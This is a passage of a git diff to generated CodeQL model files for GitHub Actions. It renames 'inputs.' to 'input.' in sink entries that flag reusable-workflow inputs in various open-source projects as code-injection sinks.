["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", 
"input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 3a911989874..1d8dc84c2f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.build_mode", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.release_branch", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.images_tag", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.quay_org", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "inputs.target_branch", "code-injection", "generated"] \ No newline at end of file + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.images_tag", "code-injection", "generated"] + - 
["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "input.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index 3c525970ecc..f404aa73762 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 187b3d2fd0a..2f546ce3f57 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "inputs.k8s-version", "code-injection", "generated"] - - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 3e11359c6b3..9e8b1e43993 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_tag", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_name", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.client", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "inputs.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "input.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 819f9f0e35d..20a24a4ec7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 9f30976bbad..666a86caf88 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.VERSION_NAME", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "inputs.FULL_MATRIX", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "inputs.matrix", "code-injection", "generated"] \ No newline at end of file + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "input.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "input.matrix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 81a419fec0d..d4926952f1a 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.build_from", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image", "code-injection", "generated"] \ No newline at end of file + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "input.arch", "code-injection", "generated"] + - 
["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 35fd748afbe..144c16ff8de 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index 192b1b60843..f97ee81bcb9 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.release_id", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.filename", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.tar-file-name", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.whl-file-name", "code-injection", "generated"] \ No newline at end of file + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 5a397f743a3..401875059ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 97f40ee7c07..6d6f9e17740 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.directory", "code-injection", "generated"] - - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.cargo_make_task", "code-injection", "generated"] - - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "inputs.example_changed", "code-injection", "generated"] \ No newline at end of file + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "input.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 293939322e2..a4b2b55262f 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.push_to_s3", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.pl_version", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index c3aa198743d..dd3bfe71b7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "inputs.liquibase-version", "code-injection", "generated"] \ No newline at end of file + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 1ea78b01cd6..2207feeec22 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["litestar-org/litestar/.github/workflows/test.yml", "*", "inputs.python-version", "code-injection", "generated"] - - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 23bd3adc5a4..2128369a7a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.package_name_prefix", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.install", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_force_enable_stats", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_enable_assertions", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.build_shared_libs", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_build_type", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_cxx_compiler", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_build_type", "code-injection", "generated"] + - 
["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 77c7570ec0e..57791c68c0a 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lnbits/lnbits/.github/workflows/make.yml", "*", "inputs.make", "code-injection", "generated"] \ No newline at end of file + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 46cc5092355..2a65a351255 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "inputs.PPA_URI", "code-injection", "generated"] \ No newline at end of file + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 78a5584d04b..53f6f6da728 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.pinned_mailu_version", "code-injection", "generated"] - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.mailu_version", "code-injection", "generated"] - - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.docker_org", "code-injection", "generated"] \ No newline at end of file + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 1c3e5b565be..8ef924313a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] - - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 7e8d8061fc5..800c95ac1bf 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_END", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_START", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.xml_command", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.cmake_command", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.DISTR", "code-injection", "generated"] \ No newline at end of file + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", 
"input.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "input.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 21e3fdb8874..7a73bee6e57 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 67e49a5716c..08d64944bd9 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml 
